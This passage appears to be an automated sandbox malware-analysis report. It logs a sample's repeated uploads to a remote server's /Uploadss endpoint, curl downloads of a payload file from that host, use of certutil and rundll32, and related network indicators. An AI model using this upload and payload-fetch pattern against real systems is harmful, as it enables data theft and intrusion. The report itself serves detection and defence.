Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2aa72388551e1719
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------77f946c49d2aa0aa
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23ddd58ceee731b1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b152df86b4cdc780
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2d6437b9e8f9fa26
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f9fda7251b3940ec
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b875c75c93bfafb2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------90b1444f43bf87bb
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f596c2ad5c87a402
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eebee10a2c2a0a7e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fb127d9661ca100d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6653a23fed80a45e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------37776beab8920800
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------40df58b3406d3c6c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7048acb243c73c53
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------915bf5cdc8e28206
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b29bc1940f1b3cf8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------faed09c6aeddfcad
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9e028a09e8444741
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1ebd341a5c4734af
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0a25b701dad0bb75
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------917bcfd4af7652d9
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3755ae52020b6387
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5781aa9441631b3e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f897addde1370454
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------793f3f5fb8213a21
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------79bb560cb57ad0e1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a317104ee2cc8105
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------883a00c3844ef429
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------57415b48de4d495c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3cce8b88a3742ee2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b2be66a73755a4fd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------25a531a286c8b417
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01eb8640365fd751
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6f4cfa28ab6b91ba
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------218f885d1d1b01f5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------21ef4c783e5ef6a8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------8d935b7ab73db626
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e1bcbfd1ac49b71
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------453e0988638a690b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------936caa563e76ca26
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------96aa930188ad95d0
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1c10b124588ac309
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7cef968b537d35d7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cd9315d0f70306a2
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------1e25afe42fd86294
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------01894383c334ebcc
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2c7fc54d6c7c04d4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bb4d8fe5f94a83f5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a9d83593ce6d0496
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2c48da37d466a87
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------450e1ee269f45e90
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0089c8439ef77124
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6e3e4c3b05a79857
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------521206e0c9b94cee
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------3e6e6e56ae2cb74d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03a4310a76240f87
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0eac6bd829619dc3
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------7554e3942a8f0809
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f183d5370c54fe4b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ca18e54d06119b02
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------998ba500316220a8
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2680bd2607a01273
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------03efbda4d78b7cdf
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a35d77128ae5cf6a

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 239.255.255.250 239.255.255.250

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49772 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.69
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.160.126

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D8C0 recv,WSAGetLastError,

13_2_0087D8C0

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PxRdW7mlrrw49Sf&MD=a2PwAHxG HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /payload2.txt HTTP/1.1Host: 172.104.160.126:8099User-Agent: curl/7.83.1Accept: /

Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>

Source: global traffic

DNS traffic detected: DNS query: www.google.com

Source: unknown

Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.dr	String found in binary or memory: http://172.104.160.
Source: rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520153129.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.104.160.126:5000/Upl
Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 